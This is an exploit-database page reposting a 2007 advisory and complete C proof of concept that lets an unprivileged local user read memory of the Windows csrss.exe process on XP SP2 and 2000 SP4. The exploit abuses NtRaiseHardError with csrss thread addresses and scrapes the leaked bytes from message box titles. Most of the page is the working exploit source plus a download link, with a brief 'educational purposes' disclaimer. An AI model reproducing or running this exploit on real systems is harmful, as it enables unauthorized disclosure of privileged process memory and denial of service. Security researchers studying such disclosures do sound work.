NtRaiseHardError Csrss.exe memory Disclosure exploit

2007.01.02
Risk: Low
Local: Yes
Remote: No
CWE: CWE-Other


CVSS Base Score: 6.6/10
Impact Subscore: 9.2/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: Complete

Hi, I have been taking a look at the NtRaiseHardError bug and just for fun I've coded an exploit. Watch out, not for the double free vulnerability (indeed I have not analyzed that piece of code yet) but just relying on NtRaiseHardError internals and how is dispatched a MessageBox with MB_SERVICE_NOTIFICATION parameter enabled... In google groups there are old references for this bug as a DoS.Unprivileged users can exploit that bug in order to read Csrss.exe process memory though. Not a big deal, but curious at least. Tested on XP SP2 and 2K SP4 fully patched. cheers, Rubn. ---------------------------------------------- Direct download http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func =fileinfo&id=43 ///////////////////////////////////////// ///////////////////////////////////////// ///// Microsoft Windows NtRaiseHardError ///// Csrss.exe memory disclosure ///////////////////////////////////////// ///// Ruben Santamarta ///// ruben at reversemode dot com ///// www.reversemode.com ///////////////////////////////////////// ///// 12.27.2006 ///// For educational purposes ONLY ///// Compiled using gcc (Dev-C++) //////////////////////////////////////// #include <stdio.h> #include <windows.h> #include <winbase.h> #include <ntsecapi.h> #define UNICODE #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) #define STATUS_SUCCESS ((NTSTATUS) 0x00000000) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004) #define STATUS_INVALID_PARAMETER ((NTSTATUS) 0xC000000D) #define SystemProcessesAndThreadsInformation 5 #define NTAPI __stdcall int gLen=1; typedef NTSTATUS (WINAPI *PNTRAISE)(NTSTATUS, ULONG, ULONG, PULONG, UINT, PULONG); typedef LONG NTSTATUS; typedef LONG KPRIORITY; typedef struct _CLIENT_ID { DWORD UniqueProcess; DWORD UniqueThread; } CLIENT_ID, * PCLIENT_ID; typedef struct _VM_COUNTERS { SIZE_T PeakVirtualSize; SIZE_T VirtualSize; ULONG PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage; } VM_COUNTERS; typedef struct _SYSTEM_THREAD_INFORMATION { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientId; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; LONG State; LONG WaitReason; } SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION; typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved1[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ProcessName; KPRIORITY BasePriority; ULONG ProcessId; ULONG InheritedFromProcessId; ULONG HandleCount; ULONG Reserved2[2]; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; SYSTEM_THREAD_INFORMATION Threads[5]; } SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION; typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD); ULONG GetCsrssThread() { ULONG cbBuffer = 0x5000; ULONG tPointer; LPVOID pBuffer = NULL; NTSTATUS Status; PCWSTR pszProcessName; DWORD junk; ULONG ThreadCount; int i=0,b=0; PQUERYSYSTEM NtQuerySystemInformation; PSYSTEM_THREAD_INFORMATION pThreads; PSYSTEM_PROCESS_INFORMATION pInfo ; NtQuerySystemInformation = (PQUERYSYSTEM) GetProcAddress( LoadLibrary( "ntdll.dll" ), "NtQuerySystemInformation" ); do { pBuffer = malloc(cbBuffer); if (pBuffer == NULL) { printf(("Not enough memoryn")); break; } Status = NtQuerySystemInformation( SystemProcessesAndThreadsInformation, pBuffer, cbBuffer, NULL); if (Status == STATUS_INFO_LENGTH_MISMATCH) { free(pBuffer); cbBuffer *= 2; } else if (!NT_SUCCESS(Status)) { printf("NtQuerySystemInformation Error! "); free(pBuffer); } } while (Status == STATUS_INFO_LENGTH_MISMATCH); pInfo = (PSYSTEM_PROCESS_INFORMATION)pBuffer; for (;;) { if (pInfo->NextEntryDelta == 0) break; if(pInfo->ProcessName.Buffer!=NULL && !wcsicmp(pInfo->ProcessName.Buffer,L"csrss.exe")) { printf("n[%ws] nn", pInfo->ProcessName.Buffer); printf("5 addresses for testing purposesnn"); for(b=0;b<5;b++) { printf("Thread %d -> 0x%xn",b,pInfo->Threads[b].StartAddress); } tPointer=(ULONG)pInfo->Threads[1].StartAddress; } pInfo = (PSYSTEM_PROCESS_INFORMATION)(((PUCHAR)pInfo) + pInfo->NextEntryDelta); } free(pBuffer); return tPointer; } VOID WINAPI ReadBox( LPVOID param ) { HWND hWindow,hButton,hText; int i=0,b=0; int gTemp; char lpTitle[300]; char lpText[300]; char lpBuff[500]; for (;;) { lpText[0]=(BYTE)""; Sleep(800); hWindow = FindWindow("#32770",NULL); if(hWindow != NULL) { GetWindowText(hWindow,(LPSTR)&lpTitle,250); hText=FindWindowEx(hWindow,0,"static",0); GetWindowText(hText,(LPSTR)&lpText,250); hText=GetNextWindow(hText,GW_HWNDNEXT); GetWindowText(hText,(LPSTR)&lpText,250); gTemp = strlen(lpTitle); if ( gTemp>1 ) gLen = gTemp; else gLen = 1; for(i = 0; i < gTemp; i++) printf("%.2X",(BYTE)lpTitle[i]); SendMessage(hWindow,WM_CLOSE,0,0); ZeroMemory((LPVOID)lpTitle,250); ZeroMemory((LPVOID)lpText,250); ZeroMemory((LPVOID)lpBuff,300); } } } int main() { UNICODE_STRING uStr={5,5,L"fun!"}; ULONG retValue,args[]={0,0,&uStr}; ULONG csAddr; PNTRAISE NtRaiseHardError; int i=0; system("cls"); printf("##########################################n"); printf("### Microsoft Windows NtRaiseHardError ###n"); printf("##### Csrss.exe memory disclosure ######n"); printf("@@@@@ Xmas Exploit - ho ho ho! @@@@@@n"); printf("## Ruben Santamarta www.reversemode.com ##n"); printf("##########################################nn"); NtRaiseHardError=(PNTRAISE)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtRaiseHardError"); csAddr=GetCsrssThread(); args[0]=csAddr; args[1]=csAddr; printf("n[+] Capturing Messages n"); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)ReadBox, 0, 0, NULL); printf("n[+] Now reading at: [0x%p] - Thread 1nn",csAddr); for(;;) { printf("Reading bytes at [0x%p] : ",args[0]); NtRaiseHardError(0x50000018,3,4,args,1,&retValue); if(retValue && gLen<=1) printf("00n"); else printf("n"); args[0]+=gLen; args[1]+=gLen; } }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top